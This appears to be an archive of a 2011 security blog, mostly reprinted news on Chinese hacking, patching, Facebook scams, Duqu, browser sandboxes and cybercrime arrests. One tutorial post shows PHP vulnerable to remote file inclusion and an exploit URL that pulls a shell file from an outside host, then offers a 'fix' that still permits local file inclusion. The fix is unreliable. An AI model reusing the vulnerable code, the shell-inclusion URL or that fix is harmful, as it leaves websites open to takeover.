Sahara Security Blog

Hidden Dragon: The Chinese cyber menace !

2011-12-25T17:41:00.000Z

Analysis Cybercrooks and patriotic state-backed hackers in China are collaborating to create an even more potent security threat, according to researchers.

Profit-motivated crooks are trading compromised access to foreign governments' computers, which they are unable to monitise, for exploits with state-sponsored hackers. This trade is facilitated by information broker middlemen, according to Moustafa Mahmoud, president of The Middle East Tiger Team.

Mahmoud has made an extensive study of the Chinese digital underground that partially draws on material not available to the general public, such as books published by the US Army's Foreign Military Studies Office, to compile a history of hacking in China. His work goes a long way to explain the threat of cyber-espionage from China that has bubbled up towards the top of the political agenda over recent months.

The first Chinese hacking group was founded in 1997 but disbanded in 2000 after a financial row between some of its principal players led to a lawsuit. At its peak the organisation had about 3,000 members, according to Mahmoud. The motives of this so-called Red Hacker group were patriotic, defending motherland China against its enemies.

The hacking the US Embassy and the White House over the accidental bombing of the Chinese Embassy in Belgrade back in 1999 brought many flag-waving Chinese hackers together to, as they saw it, defend the honour of the motherland and fight imperialism in cyberspace.

This role was taken over by the Honker Union of China (HUC) after 2000, and the HUC later became the mainstay of the Red Hacker Alliance. China’s so-called “red hackers” attack critics of the state and infiltrate foreign government and corporate sites – among other activities. The phenomenon of patriotic hackers is far from restricted to China and also exists in Russia, for example. Russian hackers tend to make greater use of defacement and botnets to silence critics rather than spying.

Enter the Dragon

Over more recent years, different groups – which are involved in cybercrime to make money rather than patriotic hacking – have emerged in China, some of which are affiliated with the Triads. These groups are involved in running so-called bulletproof hosting operations, providing services for other phishing fraudsters and the like that ignore takedown notices that ethical ISPs would comply with - as well as various botnet-powered scams, spam and paid-for DDoS attacks for hire. "These firms did not target Chinese firms and were are therefore not prosecuted," Mahmoud explained.

Over the years patriotic hacker groups and criminal hackers have forged alliances, a process facilitated by the Chinese government and in particular the Peoples' Liberation Army, according to Mahmoud. One landmark event in this process was the defacement of Western targets and similar cyber-attacks following the downing of a Chinese jet by US warplanes in 2001. These attacks promptly ceased after they were denounced by the People's Daily, the organ of the ruling Communist Party.

The Chinese government began to see the potential of cyberspace at around this time and established a PLA hacking corp, as Mahmoud described it, featuring hand-picked soldiers who showed talent for cyber-security.

Mahmoud said that despite the existence of this corps the Chinese often prefer to use "freelance hackers" for "plausible deniability". "We can talk about hackers but it's better to talk about businessmen selling secrets. An entire underground industry has grown up to support cybercrime," he said.

There are various roles within such group including malware distribution, bot master, account brokers and "most importantly vulnerability researchers, whose collective ingenuity has been applied to run attacks against Western targets and to develop proprietary next-generation hacking tools", according to Mahmoud.
Small groups, including the Network Crack Program Hacker (NCPH), that research gaping security holes and develop sophisticated malware strains are reportedly sponsored by the PLA.

Western governments, hi-tech firms, oil exploration outfits and military targets have variously been targeted in a expanding series of so-called Advanced Persistent Threat (APT) cyber-attacks, commonly featuring Trojan backdoors, over the years. These operations have been known as TitanRain, ShadyRAT and Night Dragon, among others.

"It's sometimes difficult to differentiate between state-sponsored and industrial espionage attacks but what's striking is that all these attacks happen between 9am and 5pm Chinese time," Mahmoud noted.

Gaining access to industrial secrets is part of a deliberate targeted government plan, Programme 863, whose mission aim is to make Chinese industry financially independent of foreign technology. It also has a military dimension. "China sees cyberspace as a way of compensating for its deficiency in conventional warfare, for example by developing strategies to cripple communication networks," Mahmoud said. "That does not mean China wants to fight. Inspired by the ideas of Sun Tzu [author of The Art of warfare] China regards it as a superior strategy to break the enemy without having to fight."

North Korea is also developing expertise in cyber-warfare, running training schools that resemble those run in China. However there is little or no collaboration between the two countries, according to Mahmoud.
"The Chinese see their expertise in cyberspace as an edge they are not willing to share. That's why there is no collaboration with hackers outside the country."

The Wall Street Journal reported last Tuesday that US authorities have managed to trace several high-profile hacking attacks, including assaults against RSA Security and defence contractor Lockheed Martin, back to China. Information obtained during an attack on systems behind RSA's SecurID tokens was later used in a failed attack against Lockheed Martin.

"US intelligence officials can identify different groups based on a variety of indicators," the WSJ reports. "Those characteristics include the type of cyberattack software they use, different internet addresses they employ when stealing data, and how attacks are carried out against different targets. In addition to US government agencies, major targets of these groups include US defence contractors."

US investigators working for the National Security Agency have reportedly identified twenty groups of hackers, a dozen of which have links to China's People's Liberation Army. Others are affiliated to Chinese universities. In total, several hundred people are said to be involved in the attacks, some of whom have been individually identified. The information has helped to strengthen the US's hand in diplomatic negotiations with China.

The data also provides a list of targets for possible counter-attacks.
Bloomberg reports in a similar vein that China is engaged in an undeclared cyber Cold War against Western targets with the goal (unlike the Soviet-era Cold War) of stealing intellectual property rather than destabilising regimes or fostering communism.

Targets have included tech giants such as Google and Intel to iBahn, selected because it supplies Wi-Fi technology to hotels frequented by Western execs, oil exploration biz bosses and government and defence contractors. Chinese hackers stand accused of stealing anything and everything that isn't nailed down from as many as 760 different corporations over recent years resulting losses in intellectual property valued in the billions.

Paper tiger, hidden Trojan

Recent reports have painted a conflicting picture of Chinese cyber-warfare capabilities. A recent report [PDF] by The Office of the National Counterintelligence Executive (ONCIX), which was presented to Congress, named and shamed China and Russia for running cyber-espionage campaigns geared towards stealing the US's technology and economic secrets. The report, straightforwardly titled Foreign Spies Stealing US Economic Secrets in Cyberspace, described China as the source of the majority of intrusions without blaming its government directly.

Some observers suggest that the US intelligence community has decided to publicly finger China and Russia over cyber-espionage only after diplomatic efforts failed to yield a result.

China routinely and angrily denies any involvement in cyber-espionage, arguing that it is frequently victimised by these types of attacks itself, and most recently said that it wanted to help improve cyber-security defences across all nations.

Regardless of what's happening elsewhere we've frequently heard praise for the staffers of China's computer emergency response centres. Over several years various businesses and teams in the country have been more pro-active and helpful in working with organisations, such as Spamhaus, in dealing with spam.

However evidence showing that Chinese denials over the use of hacking tools ought not to be taken at face value emerged unexpectedly earlier this year. An extract from a propaganda film illustrated the use of custom tools to hack websites run by the banned spiritual movement Falun Gong. The video named the PLA's Electrical Engineering University as the source of the utility.

Security experts who have visited China praise its universities. HD Moore, the developer of Metasploit and chief security officer at Rapid7, said: "They are focused on defending China and malware research."

Moore, who toured computer science departments in universities in Beijing and elsewhere, found students frequently had an aptitude for malware analysis, and saw the potential for work in this area. However those with expertise in exploit development were "few and far between", he said. "Not that many people in China are doing penetration testing work either," he added.

A recent report by the Australian National University concludes that China's cyber-warfare capabilities, at least, are actually mediocre at best. Desmond Ball, a professor at the Australian National University, argues China's offensive capabilities are limited. Local internet systems are notable for their deficiencies and vulnerabilities, he adds.

Information security experts, particularly with an intelligence background remain wary of China's capabilities.
Prescott Winter, chief technology officer for the public sector at HP ArcSight and former NSA associate deputy director of national intelligence for information integration, said that China remains a major threat.
"China is a major player in cyber-espionage. It has a well-constructed underground economy that is targeting intellectual property. Western governments are also at the front line," he said, adding that hackers often cause collateral damage when they access and ransack targeted networks.

Other former intelligence officials argue that the focus on China hides the greater truth that everyone is engaged in cyber-espionage.

"Every country (especially China, Russia, and even our allies), engages in industrial espionage against the United States and each other," writes Marcus Carey, who worked for the NSA for eight years before joining Rapid7 as a security researcher and community manager.

"For these countries, cyber-espionage is likely just the tip of the iceberg, very much complementing the main areas of espionage being conducted in the physical world," he said. "It’s much cheaper for foreign governments to 'borrow' research and development information and go straight into production, particularly in countries like China and India where there is a strong supply of industrial low-wage workers to crank out products. For this and other reasons, espionage is certainly not a new practice, rather the internet has simply made it more visible and traceable."

"The truth is, a good espionage program is vital to a country's success, as we saw during WWII and the Cold War. It is the responsibility of governing agencies to perform espionage against other countries, as well as helping their own citizens with counter-espionage and cyber defense strategies," he added.
Carey, paraphrasing baseball legend Mark Grace on cheating, concludes "countries that aren't engaging in espionage aren't trying hard enough!" ®

Hacknote

Dexter fans may like to know that the Chinese characters for hacker transliterate to Dark Visitor. A blog of the same name is one of the best online resources keeping hype-free tabs on the Chinese cybercrime scene.

Security : Fixing RFI Vulnerability !!

2011-12-23T20:14:00.001Z

Hello !

I was wondering, why most of WebMasters don't Fix Vulnerabilities on thier Websites ?. And yet complains from hackers ??. Perhaps they don't know, but, why would they open a website if they don't know ?!! why won't they learn?!

So for that i created this article, to help you learning one way of Fixing your websites Vulnerabilities without needing anyone :D. and todays Vulnerability is : RFI.

A lot of you will ask : what is RFI ?

Answer : RFI is an abbreviation of " Remote File Inclusion ", it's a Vulnerability or Security Error that allowed others (Hackers & Crackers) to include a file (mostly Shell File) to your website in order to hack it of course.

Question : How will they include file in my website without even uploading it ?!!

Answer : too easy !, most of RFI Vulnerability will appear like this :

<?php
// coded by Tahar ZoFix for training porposes
if(empty($_GET['insert'])){
echo "Please Choose a File";
} else {
include($_GET['insert']);
}
?>

And in the URL :

www.yourwebsite.com/xxxx.php?yyyy=File

with : xxxx = name of a file ( in here : view.php)
yyyy = in here insert

Ok, now to utilise this Error, i will do like this :

www.yourwebsite.com/xxxx.php?yyyy=http://target.com/shell.txt?

with : http://target.com/shell.txt? : is where the shell was uploaded on format TXT (really important) and in after the sign '?' ( it means apply the php codes inside the file, also really important).

So now to Fix it, you have to make sure that the file is in your server,

to do that :


   <?php

   // coded by Tahar ZoFix for training porposes

   if(empty($_GET['insert'])){

   echo "Please Choose a File";

   } else {

   include(getcwd() . $_GET['insert']);

   }

   ?>

The code above will make sure that, the file is in your server, and you will avoid the RFI Error.

For time shorting, and to make the article short and understandable, i passed some steps not really important and it won't do anything in the contenu of the article.

I hope you find it easy to understand, and if there any requets, do not hesitate to contact me :).

Lesson By; Tahar ZoFix

Sahara Security Blog.

Clever patching keeps the system serviceable !

2011-12-22T21:19:00.000Z

t was the kind of day most systems administrators would like to forget. A customer of Canadian security consultant David Lewis, founder of the Liquidmatrix Security Digest, had decided to roll out a software patch to a Symantec product.

Unfortunately, the firm didn’t check the patch as well as it could have and the tweak disabled its firewalls.

Patch management looks easy but can cause nightmares if not handled properly, says Lewis, who warns that companies should never rely completely on automation.

“You will always need a human element,” he says.

The patch management challenge intensifies as the number of applications in an enterprise grows. Microsoft’s update service does a good job of looking after its own applications, but takes you only so far.
Third-party applications are harder to pinpoint and manage, and they represent roughly two-thirds of the problem. In 2010, 69 per cent of the sources of vulnerabilities on endpoints were found to have originated with third-party programs.

In 2006, patching Microsoft applications and the operating system on the average endpoint would have eliminated 55 per cent of vulnerabilities. In 2010, it got rid of just 31 per cent.

Take Adobe, for example. The company has suffered from several serious vulnerability exploits over the years, one of which appeared in September. A zero-day in the Flash player makes it possible for attackers to take control of a machine and the firm admitted that it was being exploited in the wild.

Adobe’s PDF reader has also had critical vulnerabilities, and fleeing to alternatives such as FoxIT’s PDF Reader doesn’t help. It, too, has suffered from vulnerability issues.

Fast work

In addition to patches that break systems in weird ways, time management can also be an issue. In many companies, the window available to take down systems for planned maintenance is shrinking, so patches must be rolled out faster.

However, Kamel Patel, a UK practice manager at giant IT services company Dimension Data, claims the last time he had to install a patch on a machine that needed a mandatory reboot was a while back. The move to the cloud, he argues, has made patch management easier.

“Some of the issues when you installed a patch and it overrode another file are reduced,” he says.
Not everyone buys the Utopian idea of patch-free IT departments. “So, why did Google and Adobe get nailed using IE 6?" asks Lewis.

Both companies were compromised during 2009 by zero-day attacks that exploited Internet Explorer 6 in an onslaught known as Operation Aurora. These companies were running a browser a couple of generations older than the one currently available.

“Why?” asks Emerson Tan, founder of PacketStorm, an online community that collects vulnerabilities and exploits. “Because nobody has bothered to fix their corporate intranets. Upgrading to something with most of the flaws fixed will simply break their internal apps."

Enveloping cloud

Brian Bourne, founder of Sector, a security conference taking place in Toronto in October, is equally sceptical that cloud-based apps escape patch management issues.

“You have less control because you have to move forward when they say so," he says.

Cloud-based application vendors update their software regularly without customer input. As an enterprise user, you may be able to stay on an earlier revision for a while by negotiating with the vendor, but that won’t last forever.

“You might have written something that interfaces with its application. Or there may be some feature it removed or altered that you were dependent on but which it figured no customers were using," says Bourne.

Other challenges include the consumerisation of IT, which encourages employees and contractors to bring in devices such as tablets and smartphones.

Making sure these are adequately patched creates a whole new set of problems, landing us in the sticky area of network access control, network quarantine and policy servers to manage the whole tangled mess.
Smaller businesses have an easier time, according to Patel. “It's pretty straightforward," he says. “Just accept everything from Windows Update."

For many small companies, this will be adequate. But every so often, a patch appears that takes down a piece of software. For example, Microsoft's recent gaffe, in which it accidentally decided that Google Chrome was a piece of malware, caused problems for many users.

For many companies the cost of

setting up a proper test bed may be prohibitive

Ideally, customers will test everything before deploying a patch. But for many companies the cost of setting up a proper test bed and maintaining a configuration management database may be prohibitive, if not from a capital expenditure perspective, then simply because they don't have the internal nous to get the job done.

Examination fatigue

Many companies are settling for a compromise, Patel suggests. Rather than testing a patch to death with a variety of different configurations they give it quick once-over.

“You might try it out on test machines and if after a week users aren’t experiencing problems, you release it to the whole estate," he says.

Some companies may simply wait for two weeks to see if any adverse reactions to new patches turn up elsewhere, and if not, they deploy. It all depends on the level of risk that the company is comfortable with.
Ultimately, any patching strategy involves at least some human interaction, but the key lies in minimising fuss by adopting a mature approach to IT.

For example, any change management process can be made simpler by adopting just one or two images for corporate desktops, rather than juggling many desktop builds. Reporting software can also illustrate the effects of changes and help ensure that a deployment has succeeded, with minimal impact on the infrastructure.

Maintaining the reliability of your systems involves attention to detail and a refined approach to change management. Do you have what it takes?

Facebook scams now spread by dodgy browser plug-ins !!

2011-12-22T21:07:00.001Z

Con men have developed a new approach towards spreading scams on Facebook.

Instead of using status updates as a lure, the latest generation of Facebook scams attempt to trick marks into installing malicious browser extensions. The plug-ins are supposedly needed to view non-existent video clips supposedly posted by an earlier victim.

Once installed, these malign browser ad-ons spread the scam from one user's profile to another's profiles.

Elad Sharf, security researcher at Websense Security labs, explains: “Scam pages typically utilise social engineering tricks such as enticing you with videos or a free voucher. In this new scam you’re encouraged to install a browser plugin.

"The plugin is an integral part of how the scam is spread and has the ability to propagate by posting in your name on friends' pages. As much as these offers look tempting, if you’re asked to install plug-ins in order to get vouchers or watch a video – remember it could be a trick to spread scams, spam and malware.”

The bogus extensions come as add-ons for both Firefox and Chrome. More details of the scam, including screenshots, can be found in a blog post by Websense here.

A simple HTML tag will crash 64-bit Windows 7

2011-12-21T21:40:00.001Z

An unpatched critical flaw in 64-bit Windows 7 leaves computers vulnerable to a full 'blue screen of death' system crash.

The memory corruption bug in x64 Win 7 could also allow malicious kernel-level code to be injected into machines, security alert biz Secunia warns. Fortunately the 32-bit version of Windows 7 is immune to the flaw, which has been pinned down to the win32k.sys operating system file - which contains the kernel portion of the Windows user interface and related infrastructure.

Proof-of-concept code showing how to crash vulnerable Win 7 boxes has been leaked: the simple HTML script, when opened in Apple's Safari web browser, quickly leads to the kernel triggering a page fault in an unmapped area of memory, which halts the machine at a blue screen of death.

The offending script is just an IFRAME tag with an overly large height attribute. Although Safari is required to spark the system crash via HTML, modern operating systems should not allow usermode applications to bring down the machine. Microsoft is now investigating the vulnerability, which was first reported by Twitter user w3bd3vil, although the software giant is racing against hackers tracing the code execution path to discover the underlying vulnerability in Windows 7.

A video of the Safari-triggered crash along with the HTML PoC can be seen here. Other exploit scenarios might also be possible.

Irish gov - Facebook's 'Darwinian' nature keeps users safe

2011-12-21T21:37:00.002Z

Facebook's handling of its user data in Ireland is legitimate, the Irish data protection commissioner's office said today.

The DPA released a 149-page audit report detailing the outcome of a privacy inspection carried out by the information commission in Ireland.

“The audit has found a positive approach and commitment on the part of Facebook Ireland Ltd to respecting the privacy rights of its users, said Irish Data Protection Commissioner Billy Hawkes.

"Arising from the audit, Facebook-Ireland has agreed to a wide range of 'best practice' improvements to be implemented over the next 6 months, with a formal review of progress to take place in July of next year,” he added.

His deputy, Gary Davis, led the audit that was announced in September, following a number of privacy complaints brought against Facebook, whose international headquarters are in Dublin, Ireland, that were submitted to the Commission.

An Austria-based collective called Europe versus Facebook filed 22 complaints with the Irish data protection commissioner. Among other things, the group griped about Facebook's "Like" button that – it was revealed by Oz blogger Nik Cubrilovic – had carried cookies that included unique information after people had logged out of the dominant social network.
At the time, Facebook said it had "quickly" fixed the issue, but insisted there was no privacy or security breach.

As The Register pointed out in September, Facebook farms all the data it stores back to its spiritual homeland in the US.

But while a privacy audit in Ireland might have appeared significant given that the Irish data protection commissioner's office was the nearest responsible DPA outside of the firm's US headquarters, the reality was that Facebook isn't breaching European law.

Davis, who wants to see "improvements" from Facebook, acknowledged that in the audit document, seen by El Reg, and published later today. The Irish DPA described the dominant social network as having "an almost Darwinian nature", which meant it should have "robust mechanisms" in place. But the commissioner's office indicated today that it wants to see Facebook be at the forefront of data privacy online.

"Taking a leadership position that moves from compliance with the law to the achievement of best practice is for Facebook Ireland to decide but if it continues to display the commitment I witnessed throughout the audit process it is certainly achievable,” said Davis.
The report issued recommendations to Facebook and asked it to "commit" to implementing "best practice" across the company's site:

a mechanism for users to convey an informed choice for how their information is used and shared on the site including in relation to Third Party Apps;

a broad update to the Data Use Policy/Privacy Policy to take account of recommendations as to where the information provided to users could be further improved;

transparency and control for users via the provision of all personal data held to them on request and as part of their everyday interaction with the site;

the deletion of information held on users and non-users via what are known as social plugins and more generally the deletion of data held from user interactions with the site much sooner than presently;

increased transparency and controls for the use of personal data for advertising purposes;

an additional form of notification for users in relation to facial recognition/”tag suggest” that is considered will ensure Facebook Ireland is meeting best practice in this area from an Irish law perspective an enhanced ability for users to control tagging and posting on other user profiles;

an enhanced ability for users to control whether their addition to Groups by friends; and

the Compliance management/Governance function in Dublin which will be further improved and enhanced to ensure that the introduction of new products or new uses of user data take full account of Irish data protection law.

Facebook is expected to implement those commitments over the next six months, said the Irish DPA. An agreed "formal review" will undertaken by the commissioner's office in July next year. However, there are various examples throughout the audit report of Facebook batting back recommendations from the watchdog.
On the contentious issue of photo-tagging, Facebook simply said it would "examine the broader implications" of the issue during the July 2012 review.
The social network added in the report: "Facebook firmly believes that it has struck the right balance in terms of product development and user control" when it comes to use of its facial recognition tech.
On the issue of individual users having their profile pictures and names displayed in third-party ads, Facebook said it would " enter into discussions" with the commission "in advance of any plans to introduce such functionality."
The Irish data regulator had asked Facebook to consider gaining consent from its users before implementing such a feature.
Facebook EMEA policy wonk Richard Allan said: "Facebook has committed to either implement, or to consider, other 'best practice' improvements recommended by the commission, even in situations where our practices already comply with legal requirements. Meeting these commitments will require intense work over the next six months."

US constitution - legal eagles, Anti-piracy laws will smash internet

2011-12-21T01:34:00.002Z

Legal Experts in US said, that The Stop Online Piracy Act (SOPA) and the proposed PROTECT IP, will damage the world's DNS system.

Legal experts are warning that the proposed PROTECT IP and the Stop Online Piracy Act (SOPA) legislation, currently working their way through Congress, will damage the world's DNS system, cripple attempts to get better online security and violate free speech rights in the US constitution.

In an essay published in the Stanford Law Review professors Mark Lemley, David Levine and David Post warned that the overarching reach of the legislation would cause people to seek alternatives to the existing DNS system, manufacture massive technical problems in the implementation of DNSSEC and trample over rights of free expression by allowing the total suppression of published opinion based on allegations without proof, or even a hearing.

“These bills, and the enforcement philosophy that underlies them, represent a dramatic retreat from this country’s tradition of leadership in supporting the free exchange of information and ideas on the internet,” the trio warn.

Under the terms of the proposed PROTECT IP legislation a US federal prosecutor who finds a foreign website that is “dedicated to infringing activities” can force all US internet service providers, domain name registries, domain name registrars and operators of domain name servers to block either the offending page or the whole web domain from the DNS system* - effectively wiping the site off the internet map.
The professors warn that the SOPA legislation is even worse in this regard. “Under SOPA, IP rights holders can proceed vigilante-style against allegedly offending sites, without any court hearing or any judicial intervention or oversight whatsoever… and all of this occurs based upon a notice delivered by the rights holder, which no neutral third party has even looked at, let alone adjudicated on the merits,” they write.
The team also echoes concerns from Sandia Labs and others that the laws would break the implementation of DNSSEC. Those companies using the secure protocol could find themselves liable for legal action, some experts have warned, and would encourage the formation of new, unregulated DNS systems that would fracture the overall structure of the internet.

From a legal standpoint the proposed laws are almost certainly unconstitutional, the trio warns, since it can be used to deprive first amendment free speech rights without any access to a court hearing and with little or no evidence presented of a crime – indeed overseas website owners may not even be informed before a site is taken down.

Who is leading the fightback?

Some of the biggest names in the internet world have rallied to fight the current round of legislation, including some unlikely bedfellows. Vint Cerf and other leading luminaries have warned of the dangers, Google, Facebook and other online businesses are battling against it and Mozilla is mobilizing the open-source community. Even the Business Software Alliance has opposed it – and when the software industry’s anti-piracy goon squad doesn't like copyright legislation you know it has to be seriously flawed.

News of the proposed changes has even reached China, where it is inspiring some bloggers to take the piss out of America for copying the Great Firewall of China. Weiping Li, a blogger with Global Voices Advocacy, told The Register that the similarities between the two countries were amusing some.
“Now they’re copying us to build up a wall. It’s like after climbing over the wall, we then bump into another one. It’s crazy!” said one web scribbler.

Even the legislators themselves are expressing concern at the lack of technical expertise they can access during House Judiciary Committee hearings on the bills and the speed with which they are being asked to act.

“When we had that last hearing, there wasn't a single person who could answer the technical questions, and they all admitted that, even though a couple of them still opined,” complained California congressman Dan Lungren.

"But that is very unsatisfactory to me, and it ought to be very unsatisfactory to this committee, and it certainly ought to be very unsatisfactory to this institution. This is an extremely important issue. We better do it right, and I would just hope that we would take the time to do that.” ®

Bootnote

DNS, for the uninitiated, is the vital system that points browsers at websites when given a human-readable address, such as facebook.com or theregister.co.uk. Get removed from the DNS system and you can kiss goodbye to your traffic.

Duqu worm, a mystery to the laboratories of Security !

2011-12-11T21:42:00.001Z

The spread of many versions of malicious program Doqu, is major online news in the field of IT security. This is due largely to some similarities between this new worm and "The Stuxnet worm" with a bad reputation that spread in the last year. But what is of concern in this case is that the ultimate goal of Doqu worm is still unknown. Referred to experts in the fight against malicious programs Kaspersky Lab had conducted their analysis on the new malicious program, and reached the main results we'll put it here.

Duqu worm was detected for the first time in early September 2011. After an internet user in Hungary, download a malicious program components on Virustotal, which analyzes the files infected by antivirus programs from different companies (including Kaspersky Lab). But it turned out that the sample that was detected first, was just one of many components that make up the worm. After a brief period, and in a similar way, some experts in the fight against malicious programs Kaspersky Lab found a sample of another unit of the worm through the site Virustotal, and allowed the analysis to find similarities between them and the Stuxnet.

Although there are some general aspects of the similarity between the two worms Doqu and Stuxnet, but there are also significant differences. After a brief period of finding several types of worm Doqu, Kaspersky Lab experts began tracking the worm attempts to infect devices in real-time users of Kaspersky security based on the cloud. What is surprising is that during the first 24 hours the worm infecting a single system only. On the other hand, the Stuxnet worm infecting tens of thousands of systems throughout the world, and assumes, however, it was mainly aimed at industrial control systems used in Iran's nuclear programs. The worm Doku ultimate goal is still unclear.

The only infection that is registered between KasperSky's users is an infection of one of multiple units that are supposed to constitute a worm Doqu. It didn't found cases of infection through the second unit, which is, in essence, a program separate from the malignant type of Trojan-Spy. It is noteworthy that this unit of worm Doqu particular function that has the malware, it collects information on the infected machine and also monitors the executing key clicks on the keyboard of the infected device.

In this context, head of security experts at Kaspersky Lab Alexander Gostev, said : "I have not come across yet any cases of infection on computers for our customers by means of a Trojan-Spy worm Doku. This means that the worm Doqu may be directed against a small amount of specific objectives, and can use different units to target each and every one of them. "

Among the mysteries associated with Doqu worm that has not been detected so far, the primary means used to penetrate the system: has not yet been found or installed "the program falling" to do so. The search for the unity of the worm Doqu still in progress, note that this unit in particular that will help us in finding the ultimate goal of this malicious program.

source : http://www.aitnews.com.
Translated by : Tahar ZoFix.

New study - Chrome is number One !

2011-12-11T01:40:00.001Z

New study shown That, Google Chrome is The most Secured Browser, Followed by Internet Explorer, and Last Firefox.

   Google Chrome offers more protection against online attacks than any other mainstream browser, according to an evaluation that compares exploit mitigations, malicious link detection, and other safety features offered in Chrome, Internet Explorer, and Firefox.

    The 102-page report, prepared by researchers from security firm Accuvant, started with the premise that buffer overflow bugs and other security vulnerabilities were inevitable in any complex piece of software. Rather than relying on metrics such as the number of flaws fixed or the amount of time it took to release updates, the authors examined the practical effect protections included by default in each browser had on a wide class of exploits.

    Their conclusion: Chrome is the most secured browser, followed closely by Microsoft IE. Mozilla's open-source Firefox came in third, largely because of its omission of a security sandbox that shields vital parts of the Windows operating system from functions that parse JavaScript, images and other web content.
"We found that Google Chrome did the most sandboxing," Chris Valasek, who is a senior research scientist for Accuvant, told The Register. "It restricted the movements more than any other browser. Internet Explorer came up a close second because it implemented a sandbox where you could do certain things but you were allowed to do more things than you could in Chrome. Lastly, Firefox came in last because it didn't implement a sandbox yet."

    The report was commissioned by Google, but the authors insist they had complete autonomy in deciding what metrics to use and what conclusions they made. The researchers have released more than 20MB worth of data, software tools, and methodology so peers may review or build upon the research. The study focused solely on the security offered by Chrome, IE, and Firefox, which when combined account for more than 93 percent of web users, according to the report. All three browsers tested were run on Windows 7.
Their finding is backed up by anecdotal evidence, as well. Chrome has emerged unscathed during the annual Pwn2Own hacker contest for three years in a row, something no other browser entered has done. Reports of in-the-wild exploits that target the browser are also extremely rare.

Not all sandboxes are equal

In much the way traditional sandboxes prevent sand from mixing with grass on a playground, security sandboxes isolate application code inside a perimeter that's confined from sensitive OS functions. By placing severe restrictions on an application's ability to read and write to the hard drive and interact with other peripheral resources, sandboxes are designed to lessen the damage attackers can do when they successfully exploit a vulnerability in the underlying code base.

The so-called token in the Chrome sandbox, for instance, doesn't allow browser processes to access files outside of an extremely limited set of directories. It also forbids them from creating connections known as network sockets to communicate directly with servers over the internet. The sandbox in IE, by contrast, allows browser resources to read almost all parts of a hard drive and puts few restrictions on the creation of network sockets, the researchers said.

As a result, attackers who exploit a vulnerability in the Microsoft browser will have an easier time accessing contacts, documents, and other data stored on the hard drive of a targeted computer and uploading it to a command and control server.

"The Google Chrome token is far more restrictive," said Accuvant Chief Research Scientist Ryan Smith, who compared tokens to a driver's license that spells out what vehicles a holder is permitted to drive and other conditions, such as whether eyeglasses are required. "It's more like a learner's permit, whereas the Internet Explorer token is more like a Class C regular driver's license."

The researchers analyzed each browser's ability to read files, write files, and perform 13 other actions. As indicated in the graphic below, Chrome blocked all but two of them. Of those, one known as "system parameters" was partially blocked. IE, meanwhile, completely blocked only two actions, and partially blocked seven more actions. Seven additional actions, including the ability to read files, access networks, and create processes, were completely unrestricted.

In last place was Firefox, which allowed nine actions and partially blocked the remaining six actions.

(click on the picture to see it in real size)

Sin of omission

The report refers to sandboxing as a "standard best practice within many popular applications." Chrome implements sandboxes in versions that run on Windows, Mac OS X, and Linux. Microsoft deployed sandboxing more than five years ago, starting when users ran IE version 7 on Windows Vista or later versions of Windows. Even Apple, which commands a tiny fraction of the browser market, implemented a robust sandbox in versions of Safari that run on Lion, the latest release of OS X.
In this context, the continuing failure of Firefox to offer sandboxing features is hard to excuse.
In a statement issued prior to the release of Accuvant's report, Johnathan Nightingale, Mozilla's director of Firefox engineering, said:

"Firefox includes a broad array of technologies to eliminate or reduce security threats, from platform level features like address space randomization to internal systems like our layout frame poisoning system. Sandboxing is a useful addition to that toolbox that we are investigating, but no technology is a silver bullet. We invest in security throughout the development process with internal and external code reviews, constant testing and analysis of running code, and rapid response to security issues when they emerge. We're proud of our reputation on security, and it remains a central priority for Firefox.

Reining in add-ons

The researchers also gave Chrome high marks for the strict limitations it places on software add-ons that extend the things users can do with the browser. As a result, attackers who manage to exploit extension bugs or trick victims into installing malicious add-ons are severely limited in the damage they can do. By comparison, IE and Firefox give extensions much wider latitude. IE add-ons, for instance, have the ability to create processes and to access the Windows clipboard, which can be a means of funneling malicious data from one application to another.

The other area where Chrome outflanked its rivals was its offering of what's known as JIT hardening. Short for just in time, JIT refers to code that's compiled on the fly and executed inside the browser. Attackers have long relied on JIT techniques to convert JavaScript into malicious machine code that bypasses exploit mitigations such as ASLR.

JIT hardening in Chrome, and to a lesser extent in IE, counteract JIT attacks by compiling JavaScript in an unpredictable way that makes it hard for attackers to control. Mozilla developers have yet to implement the feature in Firefox.

(click on the picture to see it in real size)

Besides ranking the security of the top three browsers, the paper argues that many of the metrics regularly used to gauge how well software stands up to hack attacks are unreliable. One such metric is the number of vulnerabilities patched, based on the assumption that more bugs indicate poorer-quality code than programs with fewer bugs. Other frequently cited factors include how quickly bugs are fixed and the severity of the bugs.

In the end, a browser will either succumb to a given exploit or it won't, and that's all that mattered to the paper's authors.

"We really didn't believe those [metrics] had much merit because it's really hard to correlate those things, especially between browsers and vendors," said Valasek, who along with Smith, was assisted by Accuvant colleagues Joshua Drake, Paul Mehta, Charlie Miller, and Shawn Moyer. "So we decided: Let's focus this paper on exploitation mitigation technology to show how these actually stand up against attackers when they find a vulnerability."

hacking 150 Subway shops by Four Romanians

2011-12-11T01:30:00.001Z

Four Romanian Hackers were charged with Stealing millions of dollars by hacking into the credit card processing systems of more than 200 businesses.

The men remotely accessed point-of-sale systems of 150 Subway sandwich shops and 50 unnamed retailers and stealing credit card data for more than 80,000 customers, according to a federal indictment unsealed earlier this week. They used the stolen account information to make unauthorized purchases worth millions of dollars, prosecutors said.

The men allegedly scanned the internet to identify POS terminals that used certain remote desktop software applications and then gained unauthorized access to them by guessing or brute forcing passwords.

The indictment, filed in US District Court in New Hampshire, named Adrian-Tiberiu Oprea, 27, Iulian Dolan, 27, Cezar Iulian Butu, 26, and Florin Radu, 23. They were each charged with four counts, including conspiracy to commit computer fraud, wire fraud, and two counts of conspiracy to commit fraud in connection with access device.

DDoS attack heats Korean election !

2011-12-07T19:19:00.001Z

A political scandal in Republic of Korea over alleged denial of service attacks against the National Election Commission (NEC) website.

Police have arrested the 27-year-old personal assistant of ruling Grand National Party politician Choi Gu-sik over the alleged cyber-assault, which disrupted a Seoul mayoral by-election back in October.

However, security experts said that they doubt the suspect, identified only by his surname "Gong", had the technical expertise or resources needed to pull off the sophisticated attack. Rather than knocking the NEC website offline, the attack made a portion of the website – offering information on voting booth locations – inaccessible.

      Despite this issue resembling a technical fault rather than a DDoS attack, the incident is being treated as a criminal attack by the police, who have arrested Gong and charged him along with three others.
Police said that the "attack", which lasted for more than two hours, was launched using a total of 10 wireless internet connections, including five T-Login and five WiBro connections. Police speculated that this was either a way of making it harder to thwart the attack or an attempt to complicate police efforts to investigate the assault. A police official told Korean daily newspaper The HankYoreh: “This went beyond simply using zombie PCs and wireless internet to launder IP addresses. It was a sophisticated attack.”

